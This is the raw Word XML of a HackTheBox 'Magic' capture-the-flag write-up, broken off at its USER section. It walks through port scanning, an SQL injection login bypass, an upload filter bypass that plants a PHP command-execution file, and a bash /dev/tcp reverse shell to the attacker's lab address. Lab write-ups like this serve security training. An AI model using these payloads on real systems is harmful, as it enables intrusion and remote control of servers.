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2B9CE9" w14:textId="4638A64B" w:rsidR="002E1D55" w:rsidRPr="00D82C18" w:rsidRDefault="00D82C18" w:rsidP="00D82C18">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Aharoni" w:hAnsi="Aharoni" w:cs="Aharoni"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D82C18">
        <w:rPr>
          <w:rFonts w:ascii="Aharoni" w:hAnsi="Aharoni" w:cs="Aharoni" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>HACKTHEBOX – MAGIC WRITEUP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06507799" w14:textId="56BB6AA8" w:rsidR="00D82C18" w:rsidRDefault="00D82C18" w:rsidP="00D82C18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E909D9" wp14:editId="60EBF24D">
            <wp:extent cx="3078480" cy="2857500"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="1" name="Picture 1" descr="HackTheBox - Magic Walkthrou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ckTheBox - Magic Walkthrough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80B4" w14:textId="50405B13" w:rsidR="00D804B1" w:rsidRDefault="00D82C18" w:rsidP="00D804B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IP: 10.10.10.185</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75505236" w14:textId="0F55E14B" w:rsidR="00D82C18" w:rsidRDefault="00D82C18" w:rsidP="00D82C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Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266E97A8" w14:textId="3DB9DFDE" w:rsidR="00D82C18" w:rsidRDefault="00D82C18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First, we will run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECE2F47" w14:textId="042976D8" w:rsidR="00D82C18" w:rsidRPr="00D82C18" w:rsidRDefault="00D82C18" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D82C18">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45C0DE30" wp14:editId="21194FCA">
            <wp:extent cx="5621442" cy="2293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6199" cy="23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203" w14:textId="6B3B685B" w:rsidR="00D82C18" w:rsidRDefault="00D804B1" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The scan shows 2 ports are open. Port 22 for SSH and port 80 for Apache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611F6BB5" w14:textId="2F1D540B" w:rsidR="00D804B1" w:rsidRDefault="00D804B1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I will start an all ports </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> scan</w:t>
      </w:r>
      <w:r w:rsidR="00E237FA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00E237FA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>( -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E237FA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>p )</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> just in case there are more open ports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40858683" w14:textId="6316C688" w:rsidR="00D804B1" w:rsidRDefault="00D804B1" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D804B1">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DBE6941" wp14:editId="4FECF358">
            <wp:extent cx="4632960" cy="58964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8562" cy="5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3A8D" w14:textId="3C8F85B4" w:rsidR="00D804B1" w:rsidRDefault="00D804B1" w:rsidP="00D82C18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Apache web server has a wider attack surface, so that is what I am going to enumerate more first.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69091D69" w14:textId="0A33F402" w:rsidR="00D804B1" w:rsidRDefault="00D804B1" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D804B1">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DD4EE5E" wp14:editId="17253A22">
            <wp:extent cx="5943600" cy="2893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B969" w14:textId="55F5C427" w:rsidR="00D804B1" w:rsidRDefault="00D804B1" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Port 80 gives a web page with a bunch of images.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAC92DD" w14:textId="3FAA8CEB" w:rsidR="00D804B1" w:rsidRDefault="00D804B1" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Clicking an image only displays the clicked image.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409789FA" w14:textId="52BC989D" w:rsidR="00D804B1" w:rsidRDefault="00D804B1" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D804B1">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B9691D9" wp14:editId="10E3027B">
            <wp:extent cx="5943600" cy="35236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56B" w14:textId="647177D3" w:rsidR="00A27E5F" w:rsidRDefault="00A27E5F" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A1732AB" w14:textId="27489AC0" w:rsidR="009F26DF" w:rsidRPr="009F26DF" w:rsidRDefault="009F26DF" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F26DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>FOOTHOLD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700EC074" w14:textId="1825B82C" w:rsidR="00A27E5F" w:rsidRDefault="00A27E5F" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>There is a login button at the bottom left corner that takes me to a php login page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1490F48C" w14:textId="6D51E669" w:rsidR="00A27E5F" w:rsidRDefault="00A27E5F" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A27E5F">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7455BECC" wp14:editId="545F7680">
            <wp:extent cx="5943600" cy="3235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0709" w14:textId="1C295FEF" w:rsidR="00A27E5F" w:rsidRDefault="00586499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Knowing that this web server has PHP files, I am going to start a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> for hidden directories and php files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A522305" w14:textId="5CE6BB8F" w:rsidR="00586499" w:rsidRDefault="00586499" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00586499">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D848F11" wp14:editId="73D8BD65">
            <wp:extent cx="5943600" cy="1734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B67" w14:textId="132DE92A" w:rsidR="00A27E5F" w:rsidRDefault="00586499" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>There is a file called “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>upload.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>”. Upload function</w:t>
      </w:r>
      <w:r w:rsidR="00E237FA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> tend to be exploitable, so I am going to take a closer look at that file. Opening that files takes me back to the login page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B61E74" w14:textId="77777777" w:rsidR="00586499" w:rsidRDefault="00586499" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B7C834D" w14:textId="0E91A802" w:rsidR="00D804B1" w:rsidRDefault="00D804B1" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04E6FD1E" w14:textId="77777777" w:rsidR="00D804B1" w:rsidRDefault="00D804B1" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D5B8917" w14:textId="2C0BF455" w:rsidR="00D804B1" w:rsidRDefault="00FF00BF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Whenever I meet a login page, I will always try some weak credentials. Sadly, they </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>didn’t</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> work on this login page.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 try some SQL injection, but the page doesn’t allow spaces for whatever reason. I use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> to intercept my login request and insert the SQL injection payload that way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D6FB3B" w14:textId="1959FA99" w:rsidR="00CE07D3" w:rsidRDefault="00CE07D3" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Username: ‘OR 1=1 -- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEF7828" w14:textId="01A82E7C" w:rsidR="00CE07D3" w:rsidRDefault="00CE07D3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Password: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>doesn’t</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> matter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE29AF3" w14:textId="6CBA11FA" w:rsidR="00CE07D3" w:rsidRDefault="00CE07D3" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Press ctrl + u to URL encode and forward it to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DA9F47" w14:textId="6FC514C0" w:rsidR="00FF00BF" w:rsidRDefault="00CE07D3" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE07D3">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74D3A70F" wp14:editId="76BCE4E1">
            <wp:extent cx="4061812" cy="28196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0A49" w14:textId="4BAC848C" w:rsidR="00CE07D3" w:rsidRDefault="00CE07D3" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>We got logged in!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3465B9B7" w14:textId="76BA0B39" w:rsidR="00CE07D3" w:rsidRDefault="00CE07D3" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE07D3">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E7B46E4" wp14:editId="69B78FBF">
            <wp:extent cx="5356860" cy="254851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930" cy="255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51D" w14:textId="28F88F6B" w:rsidR="00CE07D3" w:rsidRDefault="00CE07D3" w:rsidP="00D82C1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Exploiting an upload function is easier </w:t>
      </w:r>
      <w:r w:rsidR="00A2238A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>using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Burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, that is where I am going to insert my payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6BB817" w14:textId="3D9DF5B1" w:rsidR="00A2238A" w:rsidRDefault="00A2238A" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Uploading a php file returns an error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE76568" w14:textId="1648711E" w:rsidR="00A2238A" w:rsidRDefault="00A2238A" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A2238A">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06525747" wp14:editId="1FEB05C1">
            <wp:extent cx="2865368" cy="134885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419F" w14:textId="6CB98A5E" w:rsidR="00A2238A" w:rsidRDefault="00A2238A" w:rsidP="00D82C1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there is some file type validations going on, we need to bypass it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FE16B6" w14:textId="62A2B39E" w:rsidR="00A2238A" w:rsidRDefault="00A2238A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There are a few ways to validate a file. It can be through file extension, MIME type or magic bytes.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 am going to modify the request through the repeater tab (ctrl + r) hopefully bypass the file validations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D193A3" w14:textId="7BEE7585" w:rsidR="00A2238A" w:rsidRDefault="00A2238A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I upload a jpeg file and </w:t>
      </w:r>
      <w:r w:rsidR="00AA4986">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">put some php code in it with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AA4986">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AA4986">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6246FA8E" w14:textId="560173B4" w:rsidR="00AA4986" w:rsidRDefault="00AA4986" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA4986">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72B6D84F" wp14:editId="6B95343A">
            <wp:extent cx="3261643" cy="175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AA1E" w14:textId="3AD02E52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This is a simple php code execution script and will run any command through the “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” parameter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8DE098" w14:textId="0C9DF973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The original file name is “lol.jpeg” and I change it to “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>lol.jpeg.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135A4C4C" w14:textId="6DB0A973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After that, I send the request to the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> but I still get the error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D61A57A" w14:textId="16137BE1" w:rsidR="00AA4986" w:rsidRDefault="00AA4986" w:rsidP="00D82C1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 change the filename to “lol.php.jpeg” because there is a chance that apache .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>htaccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> is configured in a weird way and run “php.jpeg” files as php.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0484369E" w14:textId="5325658B" w:rsidR="00AA4986" w:rsidRDefault="00AA4986" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA4986">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="713481B6" wp14:editId="066105BA">
            <wp:extent cx="4465707" cy="43437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6F71" w14:textId="316A00C6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I successfully uploaded the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAC7FD9" w14:textId="23811CBF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Now we need to access the file for the server to run the php code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3899D7" w14:textId="0FB3285B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If you go back to the main page and click view image on an image there, the directory where the image is stored is on “/image/uploads/”.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 try to hit “/image/uploads/lol.php.jpeg”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671FF409" w14:textId="6BEEE078" w:rsidR="00AA4986" w:rsidRDefault="00AA4986" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA4986">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75C797D3" wp14:editId="2BA4CA3A">
            <wp:extent cx="5943600" cy="7804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4DC9" w14:textId="391D27D0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I successfully access the file. Now I will try injecting a command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8D26BD" w14:textId="3D8C84C4" w:rsidR="00AA4986" w:rsidRDefault="00AA4986" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA4986">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64CC5EE9" wp14:editId="0F61FF51">
            <wp:extent cx="3558848" cy="91447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31D6" w14:textId="3C9A8B34" w:rsidR="00AA4986" w:rsidRDefault="00AA4986" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>I run the command “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">” and </w:t>
      </w:r>
      <w:r w:rsidR="00A52566">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>it returns www-data. We know for sure we have command execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7365AB" w14:textId="4C6C5477" w:rsidR="00A52566" w:rsidRDefault="00A52566" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Now we will try a reverse shell payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F13A56" w14:textId="1A60722F" w:rsidR="00A52566" w:rsidRDefault="00A52566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Payload: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A52566">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>bash -c 'bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A52566">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A52566">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A52566">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A52566">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/10.10.14.2/9001 0&gt;&amp;1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010937EA" w14:textId="48CA23AE" w:rsidR="00A52566" w:rsidRDefault="00A52566" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>I set up a listener on port 9001, click send and we got a shell as www-data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC7930B" w14:textId="276586CD" w:rsidR="00A52566" w:rsidRDefault="00A52566" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A52566">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C29247F" wp14:editId="2169D71C">
            <wp:extent cx="5646909" cy="18899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226" w14:textId="6DB16929" w:rsidR="009F26DF" w:rsidRPr="009F26DF" w:rsidRDefault="009F26DF" w:rsidP="00D82C18">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F26DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>USER</w:t>
      </w:r>
    </w:p>
